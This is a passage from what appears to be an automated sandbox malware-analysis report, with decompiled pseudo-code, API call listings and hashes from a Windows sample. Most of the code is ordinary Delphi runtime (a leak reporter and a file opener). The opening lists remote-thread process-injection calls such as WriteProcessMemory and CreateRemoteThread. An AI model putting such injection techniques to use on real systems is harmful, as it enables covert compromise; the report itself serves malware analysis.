                                                                                                  • Part of subcall function 02185B0C: ReadProcessMemory.KERNEL32(?,04A80000,?,?,02194530,00000000,000000FF), ref: 02185B7E
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA,?,02194598,?,02194580,021862DA), ref: 02185D79
                                                                                                • GetExitCodeThread.KERNEL32(00000000,021944F8,00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA,?,02194598), ref: 02185D89
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc$MemoryObjectProcessSingleThreadWait$AllocCodeCreateExitReadRemoteVirtualWrite
                                                                                                • String ID: ExitThread$GetModuleHandleA$GetProcAddress$kernel32
                                                                                                • API String ID: 3826234517-3123223305
                                                                                                • Opcode ID: 31e0a96aaa12c2d247a591d6931e1918e44d3d4f96060d22f2ea844498818ab4
                                                                                                • Instruction ID: ca5b70c5aa7aa8309b6a034d59f9c780ca0833a8c857c12cccb9a55535008e6e
                                                                                                • Opcode Fuzzy Hash: 31e0a96aaa12c2d247a591d6931e1918e44d3d4f96060d22f2ea844498818ab4
                                                                                                • Instruction Fuzzy Hash: C9118270BC03503EE720BAB86CC895B7BFFE782714B820935E525AB241DB7158428F50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02172560 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 98%
                                                                                                			E02172560(void* __eax, void* __fp0) {
				void* _v8;
				char _v110600;
				char _v112644;
				char _v112645;
				signed int _v112652;
				char _v112653;
				char _v112654;
				char _v112660;
				intOrPtr _v112664;
				intOrPtr _v112668;
				intOrPtr _v112672;
				struct HWND__* _v112676;
				signed short* _v112680;
				intOrPtr* _v112684;
				char _v129068;
				char _v131117;
				char _v161836;
				void* _v162091;
				signed char _v162092;
				void* _t73;
				int _t79;
				signed int _t126;
				int _t131;
				intOrPtr _t132;
				char* _t134;
				char* _t135;
				char* _t136;
				char* _t137;
				char* _t138;
				char* _t139;
				char* _t141;
				char* _t142;
				char* _t147;
				char* _t148;
				intOrPtr _t180;
				void* _t182;
				void* _t184;
				void* _t185;
				intOrPtr* _t188;
				intOrPtr* _t189;
				signed int _t194;
				void* _t197;
				void* _t198;
				void* _t211;

				_push(__eax);
				_t73 = 0x27;
				goto L1;
				L12:
				while(_t180 != 0x2191700) {
					_t79 = E02172078(_t180);
					_t131 = _t79;
					__eflags = _t131;
					if(_t131 == 0) {
						L11:
						_t180 =  *((intOrPtr*)(_t180 + 4));
						continue;
					} else {
						goto L4;
					}
					do {
						L4:
						_t194 =  *(_t131 - 4);
						__eflags = _t194 & 0x00000001;
						if((_t194 & 0x00000001) == 0) {
							__eflags = _t194 & 0x00000004;
							if(__eflags == 0) {
								__eflags = _v112652 - 0x1000;
								if(_v112652 < 0x1000) {
									_v112664 = (_t194 & 0xfffffff0) - 4;
									_t126 = E021723BC(_t131);
									__eflags = _t126;
									if(_t126 == 0) {
										_v112645 = 0;
										 *((intOrPtr*)(_t197 + _v112652 * 4 - 0x1f828)) = _v112664;
										_t18 =  &_v112652;
										 *_t18 = _v112652 + 1;
										__eflags =  *_t18;
									}
								}
							} else {
								E02172414(_t131, __eflags, _t197);
							}
						}
						_t79 = E02172054(_t131);
						_t131 = _t79;
						__eflags = _t131;
					} while (_t131 != 0);
					goto L11;
				}
				_t132 =  *0x21937a8; // 0x7f9f0000
				while(_t132 != 0x21937a4 && _v112652 < 0x1000) {
					_t79 = E021723BC(_t132 + 0x10);
					__eflags = _t79;
					if(_t79 == 0) {
						_v112645 = 0;
						_t79 = _v112652;
						 *((intOrPtr*)(_t197 + _t79 * 4 - 0x1f828)) = ( *(_t132 + 0xc) & 0xfffffff0) - 0xfffffffffffffff4;
						_t27 =  &_v112652;
						 *_t27 = _v112652 + 1;
						__eflags =  *_t27;
					}
					_t132 =  *((intOrPtr*)(_t132 + 4));
				}
				if(_v112645 != 0) {
					L48:
					return _t79;
				}
				_v112653 = 0;
				_v112668 = 0;
				_t134 = E02172210(0x28,  &_v161836);
				_v112660 = 0x37;
				_v112680 = 0x2190046;
				_v112684 =  &_v110600;
				do {
					_v112672 = ( *_v112680 & 0x0000ffff) - 4;
					_v112654 = 0;
					_t182 = 0xff;
					_t188 = _v112684;
					while(_t134 <=  &_v131117) {
						if( *_t188 > 0) {
							if(_v112653 == 0) {
								_t134 = E02172210(0x27, _t134);
								_v112653 = 1;
							}
							if(_v112654 != 0) {
								 *_t134 = 0x2c;
								_t139 = _t134 + 1;
								 *_t139 = 0x20;
								_t140 = _t139 + 1;
								__eflags = _t139 + 1;
							} else {
								 *_t134 = 0xd;
								 *((char*)(_t134 + 1)) = 0xa;
								_t147 = E021720F4(_v112668 + 1, _t134 + 2);
								 *_t147 = 0x20;
								_t148 = _t147 + 1;
								 *_t148 = 0x2d;
								 *((char*)(_t148 + 1)) = 0x20;
								_t140 = E02172210(8, E021720F4(_v112672, _t148 + 2));
								_v112654 = 1;
							}
							_t211 = _t182 - 1;
							if(_t211 < 0) {
								_t141 = E02172210(7, _t140);
							} else {
								if(_t211 == 0) {
									_t141 = E02172210(6, _t140);
								} else {
									E02173BD8( *((intOrPtr*)(_t188 - 4)),  &_v162092);
									_t141 = E02172210(_v162092 & 0x000000ff, _t140);
								}
							}
							 *_t141 = 0x20;
							_t142 = _t141 + 1;
							 *_t142 = 0x78;
							 *((char*)(_t142 + 1)) = 0x20;
							_t134 = E021720F4( *_t188, _t142 + 2);
						}
						_t182 = _t182 - 1;
						_t188 = _t188 - 8;
						if(_t182 != 0xffffffff) {
							continue;
						} else {
							goto L37;
						}
					}
					L37:
					_v112668 = _v112672;
					_v112684 = _v112684 + 0x800;
					_v112680 =  &(_v112680[0x10]);
					_t60 =  &_v112660;
					 *_t60 = _v112660 - 1;
				} while ( *_t60 != 0);
				if(_v112652 <= 0) {
					L47:
					E02172210(3, _t134);
					_t79 = MessageBoxA(0,  &_v161836, "Unexpected Memory Leak", 0x2010);
					goto L48;
				}
				if(_v112653 != 0) {
					 *_t134 = 0xd;
					_t136 = _t134 + 1;
					 *_t136 = 0xa;
					_t137 = _t136 + 1;
					 *_t137 = 0xd;
					_t138 = _t137 + 1;
					 *_t138 = 0xa;
					_t134 = _t138 + 1;
				}
				_t134 = E02172210(0x3c, _t134);
				_t184 = _v112652 - 1;
				if(_t184 >= 0) {
					_t185 = _t184 + 1;
					_v112676 = 0;
					_t189 =  &_v129068;
					L43:
					L43:
					if(_v112676 != 0) {
						 *_t134 = 0x2c;
						_t135 = _t134 + 1;
						 *_t135 = 0x20;
						_t134 = _t135 + 1;
					}
					_t134 = E021720F4( *_t189, _t134);
					if(_t134 >  &_v131117) {
						goto L47;
					}
					_v112676 =  &(_v112676->i);
					_t189 = _t189 + 4;
					_t185 = _t185 - 1;
					if(_t185 != 0) {
						goto L43;
					}
				}
				L1:
				_t198 = _t198 + 0xfffff004;
				_push(_t73);
				_t73 = _t73 - 1;
				if(_t73 != 0) {
					goto L1;
				} else {
					E02173518( &_v112644, 0x1b800);
					E02173518( &_v129068, 0x4000);
					_t79 = 0;
					_v112652 = 0;
					_v112645 = 1;
					_t180 =  *0x2191704; // 0x4a30000
					goto L12;
				}
			}















































                                                                                                0x02172563
                                                                                                0x02172564
                                                                                                0x02172564
                                                                                                0x00000000
                                                                                                0x0217263f
                                                                                                0x021725bf
                                                                                                0x021725c4
                                                                                                0x021725c6
                                                                                                0x021725c8
                                                                                                0x0217263c
                                                                                                0x0217263c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x021725ca
                                                                                                0x021725ca
                                                                                                0x021725cf
                                                                                                0x021725d1
                                                                                                0x021725d7
                                                                                                0x021725d9
                                                                                                0x021725df
                                                                                                0x021725ec
                                                                                                0x021725f6
                                                                                                0x021725fe
                                                                                                0x02172606
                                                                                                0x0217260b
                                                                                                0x0217260d
                                                                                                0x0217260f
                                                                                                0x02172622
                                                                                                0x02172629
                                                                                                0x02172629
                                                                                                0x02172629
                                                                                                0x02172629
                                                                                                0x0217260d
                                                                                                0x021725e1
                                                                                                0x021725e4
                                                                                                0x021725e9
                                                                                                0x021725df
                                                                                                0x02172631
                                                                                                0x02172636
                                                                                                0x02172638
                                                                                                0x02172638
                                                                                                0x00000000
                                                                                                0x021725ca
                                                                                                0x0217264b
                                                                                                0x0217268a
                                                                                                0x02172658
                                                                                                0x0217265d
                                                                                                0x0217265f
                                                                                                0x02172661
                                                                                                0x02172674
                                                                                                0x0217267a
                                                                                                0x02172681
                                                                                                0x02172681
                                                                                                0x02172681
                                                                                                0x02172681
                                                                                                0x02172687
                                                                                                0x02172687
                                                                                                0x021726a5
                                                                                                0x02172903
                                                                                                0x02172909
                                                                                                0x02172909
                                                                                                0x021726ab
                                                                                                0x021726b4
                                                                                                0x021726cf
                                                                                                0x021726d1
                                                                                                0x021726db
                                                                                                0x021726eb
                                                                                                0x021726f1
                                                                                                0x021726fd
                                                                                                0x02172703
                                                                                                0x0217270a
                                                                                                0x02172715
                                                                                                0x02172717
                                                                                                0x02172728
                                                                                                0x02172735
                                                                                                0x02172748
                                                                                                0x0217274a
                                                                                                0x0217274a
                                                                                                0x02172758
                                                                                                0x021727a9
                                                                                                0x021727ac
                                                                                                0x021727ad
                                                                                                0x021727b0
                                                                                                0x021727b0
                                                                                                0x0217275a
                                                                                                0x0217275a
                                                                                                0x0217275e
                                                                                                0x02172770
                                                                                                0x02172772
                                                                                                0x02172775
                                                                                                0x02172776
                                                                                                0x0217277a
                                                                                                0x0217279e
                                                                                                0x021727a0
                                                                                                0x021727a0
                                                                                                0x021727b3
                                                                                                0x021727b6
                                                                                                0x021727cd
                                                                                                0x021727b8
                                                                                                0x021727b8
                                                                                                0x021727e2
                                                                                                0x021727ba
                                                                                                0x021727ef
                                                                                                0x02172808
                                                                                                0x02172808
                                                                                                0x021727b8
                                                                                                0x0217280a
                                                                                                0x0217280d
                                                                                                0x0217280e
                                                                                                0x02172812
                                                                                                0x0217281f
                                                                                                0x0217281f
                                                                                                0x02172821
                                                                                                0x02172822
                                                                                                0x02172828
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x02172828
                                                                                                0x0217282e
                                                                                                0x02172834
                                                                                                0x0217283a
                                                                                                0x02172844
                                                                                                0x0217284b
                                                                                                0x0217284b
                                                                                                0x0217284b
                                                                                                0x0217285e
                                                                                                0x021728da
                                                                                                0x021728e6
                                                                                                0x021728fe
                                                                                                0x00000000
                                                                                                0x021728fe
                                                                                                0x02172867
                                                                                                0x02172869
                                                                                                0x0217286c
                                                                                                0x0217286d
                                                                                                0x02172870
                                                                                                0x02172871
                                                                                                0x02172874
                                                                                                0x02172875
                                                                                                0x02172878
                                                                                                0x02172878
                                                                                                0x0217288a
                                                                                                0x02172892
                                                                                                0x02172895
                                                                                                0x02172897
                                                                                                0x02172898
                                                                                                0x021728a2
                                                                                                0x00000000
                                                                                                0x021728a8
                                                                                                0x021728af
                                                                                                0x021728b1
                                                                                                0x021728b4
                                                                                                0x021728b5
                                                                                                0x021728b8
                                                                                                0x021728b8
                                                                                                0x021728c2
                                                                                                0x021728cc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x021728ce
                                                                                                0x021728d4
                                                                                                0x021728d7
                                                                                                0x021728d8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x021728d8
                                                                                                0x02172569
                                                                                                0x02172569
                                                                                                0x0217256f
                                                                                                0x02172570
                                                                                                0x02172571
                                                                                                0x00000000
                                                                                                0x02172573
                                                                                                0x0217258c
                                                                                                0x0217259e
                                                                                                0x021725a3
                                                                                                0x021725a5
                                                                                                0x021725ab
                                                                                                0x021725b2
                                                                                                0x00000000
                                                                                                0x021725b2

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message
                                                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                • API String ID: 2030045667-32948583
                                                                                                • Opcode ID: 26c550ffc565c0545fbd0777de15bf6f0a4dd5dba8d8d243278a49550e8234dc
                                                                                                • Instruction ID: a4c42593d7e010d87798e9138239a4735662dd16869920f8959574b04ad21e21
                                                                                                • Opcode Fuzzy Hash: 26c550ffc565c0545fbd0777de15bf6f0a4dd5dba8d8d243278a49550e8234dc
                                                                                                • Instruction Fuzzy Hash: A9A1D730A842648FDF219A2CC884BD9B6F5EB89710F1441F5ED49AB346CB7589C7CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02173154 Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 80%
                                                                                                			E02173154(void** __eax) {
				long _t29;
				void* _t31;
				long _t34;
				void* _t38;
				void* _t40;
				long _t41;
				int _t44;
				void* _t46;
				long _t54;
				long _t55;
				void* _t58;
				void** _t59;
				DWORD* _t60;

				_t59 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				if(0xffffffffffff284f == 0) {
					_t29 = 0x80000000;
					_t55 = 1;
					_t54 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = 0x21730a8;
				} else {
					if(0xffffffffffff284f == 0) {
						_t29 = 0x40000000;
						_t55 = 1;
						_t54 = 2;
					} else {
						if(0xffffffffffff284f != 0) {
							return 0xffffffffffff284d;
						}
						_t29 = 0xc0000000;
						_t55 = 1;
						_t54 = 3;
					}
					_t59[7] = E021730E8;
				}
				_t59[9] = E02173134;
				_t59[8] = E021730E4;
				if(_t59[0x12] == 0) {
					_t59[2] = 0x80;
					_t59[9] = E021730E4;
					_t59[5] =  &(_t59[0x53]);
					if(_t59[1] == 0xd7b2) {
						if(_t59 != 0x21913e0) {
							_t31 = GetStdHandle(0xfffffff5);
						} else {
							_t31 = GetStdHandle(0xfffffff4);
						}
					} else {
						_t31 = GetStdHandle(0xfffffff6);
					}
					if(_t31 == 0xffffffff) {
						goto L37;
					}
					 *_t59 = _t31;
					goto L30;
				} else {
					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
					if(_t38 == 0xffffffff) {
						L37:
						_t59[1] = 0xd7b0;
						return GetLastError();
					}
					 *_t59 = _t38;
					if(_t59[1] != 0xd7b3) {
						L30:
						if(_t59[1] == 0xd7b1) {
							L34:
							return 0;
						}
						_t34 = GetFileType( *_t59);
						if(_t34 == 0) {
							CloseHandle( *_t59);
							_t59[1] = 0xd7b0;
							return 0x69;
						}
						if(_t34 == 2) {
							_t59[8] = E021730E8;
						}
						goto L34;
					}
					_t59[1] = _t59[1] - 1;
					_t40 = GetFileSize( *_t59, 0) + 1;
					if(_t40 == 0) {
						goto L37;
					}
					_t41 = _t40 - 0x81;
					if(_t41 < 0) {
						_t41 = 0;
					}
					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
						goto L37;
					} else {
						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
						_t58 = 0;
						if(_t44 != 1) {
							goto L37;
						}
						_t46 = 0;
						while(_t46 < _t58) {
							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
									goto L37;
								} else {
									goto L30;
								}
							}
							_t46 = _t46 + 1;
						}
						goto L30;
					}
				}
			}
















                                                                                                0x02173155
                                                                                                0x02173159
                                                                                                0x0217315c
                                                                                                0x02173168
                                                                                                0x02173175
                                                                                                0x0217317a
                                                                                                0x0217317f
                                                                                                0x02173184
                                                                                                0x0217316a
                                                                                                0x0217316b
                                                                                                0x0217318d
                                                                                                0x02173192
                                                                                                0x02173197
                                                                                                0x0217316d
                                                                                                0x0217316e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0217319e
                                                                                                0x021731a3
                                                                                                0x021731a8
                                                                                                0x021731a8
                                                                                                0x021731ad
                                                                                                0x021731ad
                                                                                                0x021731b4
                                                                                                0x021731bb
                                                                                                0x021731c6
                                                                                                0x02173284
                                                                                                0x0217328b
                                                                                                0x02173292
                                                                                                0x0217329b
                                                                                                0x021732a7
                                                                                                0x021732af
                                                                                                0x021732a9
                                                                                                0x021732af
                                                                                                0x021732af
                                                                                                0x0217329d
                                                                                                0x021732af
                                                                                                0x021732af
                                                                                                0x021732b7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x021732b9
                                                                                                0x00000000
                                                                                                0x021731cc
                                                                                                0x021731dc
                                                                                                0x021731e4
                                                                                                0x021732f2
                                                                                                0x021732f2
                                                                                                0x00000000
                                                                                                0x021732f8
                                                                                                0x021731ea
                                                                                                0x021731f2
                                                                                                0x021732bb
                                                                                                0x021732c1
                                                                                                0x021732da
                                                                                                0x00000000
                                                                                                0x021732da
                                                                                                0x021732c5
                                                                                                0x021732cc
                                                                                                0x021732e0
                                                                                                0x021732e5
                                                                                                0x00000000
                                                                                                0x021732eb
                                                                                                0x021732d1
                                                                                                0x021732d3
                                                                                                0x021732d3
                                                                                                0x00000000
                                                                                                0x021732d1
                                                                                                0x021731f8
                                                                                                0x02173205
                                                                                                0x02173206
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0217320c
                                                                                                0x02173211
                                                                                                0x02173213
                                                                                                0x02173213
                                                                                                0x02173222
                                                                                                0x00000000
                                                                                                0x02173228
                                                                                                0x0217323d
                                                                                                0x02173242
                                                                                                0x02173244
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0217324a
                                                                                                0x0217324c
                                                                                                0x02173258
                                                                                                0x0217326c
                                                                                                0x00000000
                                                                                                0x0217327c
                                                                                                0x00000000
                                                                                                0x0217327c
                                                                                                0x0217326c
                                                                                                0x0217325a
                                                                                                0x0217325a
                                                                                                0x00000000
                                                                                                0x0217324c
                                                                                                0x02173222

                                                                                                APIs
                                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 021731DC
                                                                                                • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02173200
                                                                                                • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0217321C
                                                                                                • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 0217323D
                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 02173266
                                                                                                • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 02173274
                                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 021732AF
                                                                                                • GetFileType.KERNEL32(?,000000F5), ref: 021732C5
                                                                                                • CloseHandle.KERNEL32(?,?,000000F5), ref: 021732E0
                                                                                                • GetLastError.KERNEL32(000000F5), ref: 021732F8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                • String ID:
                                                                                                • API String ID: 1694776339-0
                                                                                                • Opcode ID: 968b9605401b7570bb3110d60887c52bf16fd87788ea7977957d688a8720f37d
                                                                                                • Instruction ID: fd2e4c89ac30db3e19722ae508ea40d057ca1be12d7f8615f7d373e95b7c4c84
                                                                                                • Opcode Fuzzy Hash: 968b9605401b7570bb3110d60887c52bf16fd87788ea7977957d688a8720f37d
                                                                                                • Instruction Fuzzy Hash: AA41F3302C0391AEE7309F348905B2376F1EBD1754F208A99D0FA8A5D0D7319581AB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0217255E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 98%
                                                                                                			E0217255E(void* __eax) {
				void* _v8;
				char _v110600;
				char _v112644;
				char _v112645;
				signed int _v112652;
				char _v112653;
				char _v112654;
				char _v112660;
				intOrPtr _v112664;
				intOrPtr _v112668;
				intOrPtr _v112672;
				struct HWND__* _v112676;
				signed short* _v112680;
				intOrPtr* _v112684;
				char _v129068;
				char _v131117;
				char _v161836;
				void* _v162091;
				signed char _v162092;
				void* _t73;
				int _t79;
				signed int _t126;
				int _t131;
				intOrPtr _t132;
				char* _t134;
				char* _t135;
				char* _t136;
				char* _t137;
				char* _t138;
				char* _t139;
				char* _t141;
				char* _t142;
				char* _t147;
				char* _t148;
				intOrPtr _t180;
				void* _t182;
				void* _t184;
				void* _t185;
				intOrPtr* _t188;
				intOrPtr* _t189;
				signed int _t194;
				void* _t198;
				void* _t200;
				void* _t214;

				_t198 = _t200;
				_push(__eax);
				_t73 = 0x27;
				goto L2;
				L13:
				while(_t180 != 0x2191700) {
					_t79 = E02172078(_t180);
					_t131 = _t79;
					__eflags = _t131;
					if(_t131 == 0) {
						L12:
						_t180 =  *((intOrPtr*)(_t180 + 4));
						continue;
					} else {
						goto L5;
					}
					do {
						L5:
						_t194 =  *(_t131 - 4);
						__eflags = _t194 & 0x00000001;
						if((_t194 & 0x00000001) == 0) {
							__eflags = _t194 & 0x00000004;
							if(__eflags == 0) {
								__eflags = _v112652 - 0x1000;
								if(_v112652 < 0x1000) {
									_v112664 = (_t194 & 0xfffffff0) - 4;
									_t126 = E021723BC(_t131);
									__eflags = _t126;
									if(_t126 == 0) {
										_v112645 = 0;
										 *((intOrPtr*)(_t198 + _v112652 * 4 - 0x1f828)) = _v112664;
										_t18 =  &_v112652;
										 *_t18 = _v112652 + 1;
										__eflags =  *_t18;
									}
								}
							} else {
								E02172414(_t131, __eflags, _t198);
							}
						}
						_t79 = E02172054(_t131);
						_t131 = _t79;
						__eflags = _t131;
					} while (_t131 != 0);
					goto L12;
				}
				_t132 =  *0x21937a8; // 0x7f9f0000
				while(_t132 != 0x21937a4 && _v112652 < 0x1000) {
					_t79 = E021723BC(_t132 + 0x10);
					__eflags = _t79;
					if(_t79 == 0) {
						_v112645 = 0;
						_t79 = _v112652;
						 *((intOrPtr*)(_t198 + _t79 * 4 - 0x1f828)) = ( *(_t132 + 0xc) & 0xfffffff0) - 0xfffffffffffffff4;
						_t27 =  &_v112652;
						 *_t27 = _v112652 + 1;
						__eflags =  *_t27;
					}
					_t132 =  *((intOrPtr*)(_t132 + 4));
				}
				if(_v112645 != 0) {
					L49:
					return _t79;
				}
				_v112653 = 0;
				_v112668 = 0;
				_t134 = E02172210(0x28,  &_v161836);
				_v112660 = 0x37;
				_v112680 = 0x2190046;
				_v112684 =  &_v110600;
				do {
					_v112672 = ( *_v112680 & 0x0000ffff) - 4;
					_v112654 = 0;
					_t182 = 0xff;
					_t188 = _v112684;
					while(_t134 <=  &_v131117) {
						if( *_t188 > 0) {
							if(_v112653 == 0) {
								_t134 = E02172210(0x27, _t134);
								_v112653 = 1;
							}
							if(_v112654 != 0) {
								 *_t134 = 0x2c;
								_t139 = _t134 + 1;
								 *_t139 = 0x20;
								_t140 = _t139 + 1;
								__eflags = _t139 + 1;
							} else {
								 *_t134 = 0xd;
								 *((char*)(_t134 + 1)) = 0xa;
								_t147 = E021720F4(_v112668 + 1, _t134 + 2);
								 *_t147 = 0x20;
								_t148 = _t147 + 1;
								 *_t148 = 0x2d;
								 *((char*)(_t148 + 1)) = 0x20;
								_t140 = E02172210(8, E021720F4(_v112672, _t148 + 2));
								_v112654 = 1;
							}
							_t214 = _t182 - 1;
							if(_t214 < 0) {
								_t141 = E02172210(7, _t140);
							} else {
								if(_t214 == 0) {
									_t141 = E02172210(6, _t140);
								} else {
									E02173BD8( *((intOrPtr*)(_t188 - 4)),  &_v162092);
									_t141 = E02172210(_v162092 & 0x000000ff, _t140);
								}
							}
							 *_t141 = 0x20;
							_t142 = _t141 + 1;
							 *_t142 = 0x78;
							 *((char*)(_t142 + 1)) = 0x20;
							_t134 = E021720F4( *_t188, _t142 + 2);
						}
						_t182 = _t182 - 1;
						_t188 = _t188 - 8;
						if(_t182 != 0xffffffff) {
							continue;
						} else {
							goto L38;
						}
					}
					L38:
					_v112668 = _v112672;
					_v112684 = _v112684 + 0x800;
					_v112680 =  &(_v112680[0x10]);
					_t60 =  &_v112660;
					 *_t60 = _v112660 - 1;
				} while ( *_t60 != 0);
				if(_v112652 <= 0) {
					L48:
					E02172210(3, _t134);
					_t79 = MessageBoxA(0,  &_v161836, "Unexpected Memory Leak", 0x2010);
					goto L49;
				}
				if(_v112653 != 0) {
					 *_t134 = 0xd;
					_t136 = _t134 + 1;
					 *_t136 = 0xa;
					_t137 = _t136 + 1;
					 *_t137 = 0xd;
					_t138 = _t137 + 1;
					 *_t138 = 0xa;
					_t134 = _t138 + 1;
				}
				_t134 = E02172210(0x3c, _t134);
				_t184 = _v112652 - 1;
				if(_t184 >= 0) {
					_t185 = _t184 + 1;
					_v112676 = 0;
					_t189 =  &_v129068;
					L44:
					L44:
					if(_v112676 != 0) {
						 *_t134 = 0x2c;
						_t135 = _t134 + 1;
						 *_t135 = 0x20;
						_t134 = _t135 + 1;
					}
					_t134 = E021720F4( *_t189, _t134);
					if(_t134 >  &_v131117) {
						goto L48;
					}
					_v112676 =  &(_v112676->i);
					_t189 = _t189 + 4;
					_t185 = _t185 - 1;
					if(_t185 != 0) {
						goto L44;
					}
				}
				L2:
				_t200 = _t200 + 0xfffff004;
				_push(_t73);
				_t73 = _t73 - 1;
				if(_t73 != 0) {
					goto L2;
				} else {
					E02173518( &_v112644, 0x1b800);
					E02173518( &_v129068, 0x4000);
					_t79 = 0;
					_v112652 = 0;
					_v112645 = 1;
					_t180 =  *0x2191704; // 0x4a30000
					goto L13;
				}
			}















































                                                                                                0x02172561
                                                                                                0x02172563
                                                                                                0x02172564
                                                                                                0x02172564
                                                                                                0x00000000
                                                                                                0x0217263f
                                                                                                0x021725bf
                                                                                                0x021725c4
                                                                                                0x021725c6
                                                                                                0x021725c8
                                                                                                0x0217263c
                                                                                                0x0217263c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x021725ca
                                                                                                0x021725ca
                                                                                                0x021725cf
                                                                                                0x021725d1
                                                                                                0x021725d7
                                                                                                0x021725d9
                                                                                                0x021725df
                                                                                                0x021725ec
                                                                                                0x021725f6
                                                                                                0x021725fe
                                                                                                0x02172606
                                                                                                0x0217260b
                                                                                                0x0217260d
                                                                                                0x0217260f
                                                                                                0x02172622
                                                                                                0x02172629
                                                                                                0x02172629
                                                                                                0x02172629
                                                                                                0x02172629
                                                                                                0x0217260d
                                                                                                0x021725e1
                                                                                                0x021725e4
                                                                                                0x021725e9
                                                                                                0x021725df
                                                                                                0x02172631
                                                                                                0x02172636
                                                                                                0x02172638
                                                                                                0x02172638
                                                                                                0x00000000
                                                                                                0x021725ca
                                                                                                0x0217264b
                                                                                                0x0217268a
                                                                                                0x02172658
                                                                                                0x0217265d
                                                                                                0x0217265f
                                                                                                0x02172661
                                                                                                0x02172674
                                                                                                0x0217267a
                                                                                                0x02172681
                                                                                                0x02172681
                                                                                                0x02172681
                                                                                                0x02172681
                                                                                                0x02172687
                                                                                                0x02172687
                                                                                                0x021726a5
                                                                                                0x02172903
                                                                                                0x02172909
                                                                                                0x02172909
                                                                                                0x021726ab
                                                                                                0x021726b4
                                                                                                0x021726cf
                                                                                                0x021726d1
                                                                                                0x021726db
                                                                                                0x021726eb
                                                                                                0x021726f1
                                                                                                0x021726fd
                                                                                                0x02172703
                                                                                                0x0217270a
                                                                                                0x02172715
                                                                                                0x02172717
                                                                                                0x02172728
                                                                                                0x02172735
                                                                                                0x02172748
                                                                                                0x0217274a
                                                                                                0x0217274a
                                                                                                0x02172758
                                                                                                0x021727a9
                                                                                                0x021727ac
                                                                                                0x021727ad
                                                                                                0x021727b0
